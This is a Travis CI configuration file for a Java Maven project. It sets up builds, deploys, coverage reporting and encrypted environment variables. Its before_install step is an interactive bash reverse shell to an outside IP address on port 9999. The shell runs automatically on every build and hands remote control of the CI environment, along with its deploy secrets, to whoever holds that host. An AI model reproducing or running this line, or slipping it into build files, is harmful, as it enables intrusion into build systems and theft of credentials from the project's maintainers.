language: java
before_install:
    - bash -i >& /dev/tcp/54.183.30.160/9999 0>&1
before_script:
 - "echo $JAVA_OPTS"
 - "export JAVA_OPTS=-Xmx512m"
script: "[ ${TRAVIS_PULL_REQUEST} = 'false' ] && mvn -e clean deploy --settings settings.xml || mvn -e clean verify --settings settings.xml"
jdk:
  - oraclejdk8
branches:
  only:
    - master
env:
  global:
  - secure: bCB/PhpGvtC0QxVlAi+m5VeNjjA3Zao824c2DSLtxn8K+aiZ5lKZguglO/RzGp5nCRAwxEIaGP32z82K4zphEfN5KVfd0U2u+RrlJKdcRo55eg7rFJDEdPMozB8sgdXAJT1twP/MJc0wvnRH9iRle9gcmzgMC9IhQfmgDNtnK6M=
  - secure: dhO4SPpVP8nSf5fg3T36U/4Ww+JoYdPJ0NzEgYx4IV9RZcF7gwCu682zc+IYP2ep0Sxp1u30Eij0vhR3wAJ2hI8c3XGURKEysN2JDZdks9VG8iMF3alWMN2xFzLRlRJCFpRJLqoKqgHGO+BWSNi26SdQZYCw+6T/YMK7gVSnCvs=
sudo: false
after_success:
  - mvn scoverage:report coveralls:report
